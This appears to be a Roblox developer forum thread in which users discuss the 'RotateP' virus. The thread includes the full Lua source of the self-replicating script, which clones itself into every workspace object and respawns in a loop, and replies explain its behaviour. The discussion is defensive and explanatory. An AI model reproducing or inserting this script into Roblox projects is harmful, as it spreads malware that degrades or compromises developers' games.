Does anyone knows what these “RotateP” Viruses do? I’m asking because I’ve seen these a lot…
They go pretty far back in time. Apparently, it’s a fire / spread virus:
I’m having a problem when trying to join my one place - Development Discussion - DevForum | Roblox
Though it must’ve upgraded along the years.
(Do note this is based off of research and I’ve never seen that virus, if possible, include its source code).
Beware that some antiviruses can have viruses in them.
Here is the code…
if script.Parent.className ~= "RotateP" then
local p = Instance.new("RotateP")
p.Parent = workspace
p.Name = "INfecTION"
script.Parent = p
end
function check()
local list = workspace:GetChildren()
for i = 1, #list do
if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
script.Parent:Clone().Parent = list[i]
end
wait()
end
end
while true do
check()
if workspace:findFirstChild("inFECtion") == nil then
local main = script.Parent:Clone()
main.Name = "inFECtion"
main.Parent = workspace
end
wait(3)
end
It’s quite literally a virus. It injects itself into every child of workspace. It clones its parent rather than itself; is there any other script which comes bundled with this?
Just the stanard vaccine script… and some weld spamming script
Here’s my virus scripts masterpost, for more resources! It covers some very common viruses to look out for.
RotateP and other Hidden Class viruses are often times lag generators OR are containers and/or gateways for other viruses, such as 4D Being, which is a container/gateway for Wildfire.
My masterpost covers a few of these. They’ve become more common in recent months.